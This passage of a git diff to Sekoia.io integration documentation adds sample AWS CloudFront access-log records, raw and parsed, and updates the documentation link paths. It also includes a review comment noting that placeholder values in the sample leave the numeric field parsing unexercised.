rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. 
+ +=== "get_record.json" + + ```json + + { + "message": "{\"date\":\"2024-07-17\",\"x-edge-location\":\"XXXXXXX\",\"sc-bytes\":\"1289\",\"c-ip\":\"1.2.3.4\",\"cs-method\":\"GET\",\"cs(Host)\":\"xxxxxxxxxxxx.cloudfront.net\",\"cs-uri-stem\":\"/en-us/api/\",\"sc-status\":\"200\",\"cs(Referer)\":\"-\",\"cs(User-Agent)\":\"_\",\"cs-uri-query\":\"-\",\"cs(Cookie)\":\"-\",\"x-edge-result-type\":\"Miss\",\"x-edge-request-id\":\"_\",\"x-host-header\":\"cache.example.org\",\"cs-protocol\":\"https\",\"cs-bytes\":\"_\",\"time-taken\":\"_\",\"x-forwarded-for\":\"_\",\"ssl-protocol\":\"TLSv1.3\",\"ssl-cipher\":\"TLS_AES_128_GCM_SHA256\",\"x-edge-response-result-type\":\"Miss\",\"cs-protocol-version\":\"HTTP/1.1\",\"fle-status\":\"-\",\"fle-encrypted-fields\":\"-\",\"c-port\":\"_\",\"time-to-first-byte\":\"_\",\"x-edge-detailed-result-type\":\"Miss\",\"sc-content-type\":\"application/json\",\"sc-content-len\":\"-\",\"sc-range-start\":\"-\",\"sc-range-end\":\"-\",\"count\":2,\"start_time\":\"09:08:27\",\"end_time\":\"09:08:27\"}\n", + "event": { + "action": "Miss", + "category": [ + "web" + ], + "type": [ + "access" + ] + }, + "@timestamp": "2024-07-17T09:08:27Z", + "cloud": { + "provider": "aws", + "service": { + "name": "cloudfront" + } + }, + "destination": { + "address": "xxxxxxxxxxxx.cloudfront.net", + "domain": "xxxxxxxxxxxx.cloudfront.net", + "registered_domain": "cloudfront.net", + "subdomain": "xxxxxxxxxxxx", + "top_level_domain": "net" + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "status_code": 200 + } + }, + "network": { + "protocol": "https" + }, + "related": { + "hosts": [ + "xxxxxxxxxxxx.cloudfront.net" + ], + "ip": [ + "1.2.3.4" + ] + }, + "sekoiaio": { + "repeat": { + "count": 2 + } + }, + "server": { + "geo": { + "name": "XXXXXXX" + } + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "url": { + "path": "/en-us/api/" + } + } + + ``` + === "miss_record.json" 
diff --git a/_shared_content/operations_center/integrations/generated/fc99c983-3e6c-448c-97e6-7e0948e12415_sample.md b/_shared_content/operations_center/integrations/generated/fc99c983-3e6c-448c-97e6-7e0948e12415_sample.md index e7f3810eac..6cecae6ec4 100644 --- a/_shared_content/operations_center/integrations/generated/fc99c983-3e6c-448c-97e6-7e0948e12415_sample.md +++ b/_shared_content/operations_center/integrations/generated/fc99c983-3e6c-448c-97e6-7e0948e12415_sample.md @@ -4,6 +4,51 @@ In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. +=== "get_record" + + + ```json + { + "date": "2024-07-17", + "x-edge-location": "XXXXXXX", + "sc-bytes": "1289", + "c-ip": "1.2.3.4", + "cs-method": "GET", + "cs(Host)": "xxxxxxxxxxxx.cloudfront.net", + "cs-uri-stem": "/en-us/api/", + "sc-status": "200", + "cs(Referer)": "-", + "cs(User-Agent)": "_", + "cs-uri-query": "-", + "cs(Cookie)": "-", + "x-edge-result-type": "Miss", + "x-edge-request-id": "_", + "x-host-header": "cache.example.org", + "cs-protocol": "https", + "cs-bytes": "_", + "time-taken": "_", + "x-forwarded-for": "_", + "ssl-protocol": "TLSv1.3", + "ssl-cipher": "TLS_AES_128_GCM_SHA256", + "x-edge-response-result-type": "Miss", + "cs-protocol-version": "HTTP/1.1", + "fle-status": "-", + "fle-encrypted-fields": "-", + "c-port": "_", + "time-to-first-byte": "_", + "x-edge-detailed-result-type": "Miss", + "sc-content-type": "application/json", + "sc-content-len": "-", + "sc-range-start": "-", + "sc-range-end": "-", + "count": 2, + "start_time": "09:08:27", + "end_time": "09:08:27" + } + ``` + + + === "miss_record" 
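Review bot: The numeric fields in the new `get_record` sample (`cs-bytes`, `time-taken`, `c-port`, `time-to-first-byte`) are given as the placeholder `"_"`, as are `x-forwarded-for` and `x-edge-request-id`, so this example never exercises the numeric conversions the parser applies (compare `sc-bytes: "1289"` and `sc-status: "200"`, which are realistic). If the values were redacted, substitute plausible numbers rather than `_`, since the absent-value marker CloudFront actually emits is `-`, as used for `cs(Referer)` and `cs-uri-query` in the same sample.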
diff --git a/_shared_content/operations_center/integrations/generated/ff1873e7-8757-4b1a-b0ca-b33f9b27f3d9.md b/_shared_content/operations_center/integrations/generated/ff1873e7-8757-4b1a-b0ca-b33f9b27f3d9.md index 78bad17f20..4fa4d1c9e6 100644 --- a/_shared_content/operations_center/integrations/generated/ff1873e7-8757-4b1a-b0ca-b33f9b27f3d9.md +++ b/_shared_content/operations_center/integrations/generated/ff1873e7-8757-4b1a-b0ca-b33f9b27f3d9.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "access.json" diff --git a/_shared_content/operations_center/integrations/generated/ff53e0db-059b-4e16-ba90-8c4dbf5cee35.md b/_shared_content/operations_center/integrations/generated/ff53e0db-059b-4e16-ba90-8c4dbf5cee35.md index c3ea25e739..147d0ebcc3 100644 --- a/_shared_content/operations_center/integrations/generated/ff53e0db-059b-4e16-ba90-8c4dbf5cee35.md 
+++ b/_shared_content/operations_center/integrations/generated/ff53e0db-059b-4e16-ba90-8c4dbf5cee35.md @@ -27,7 +27,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_event_1.json"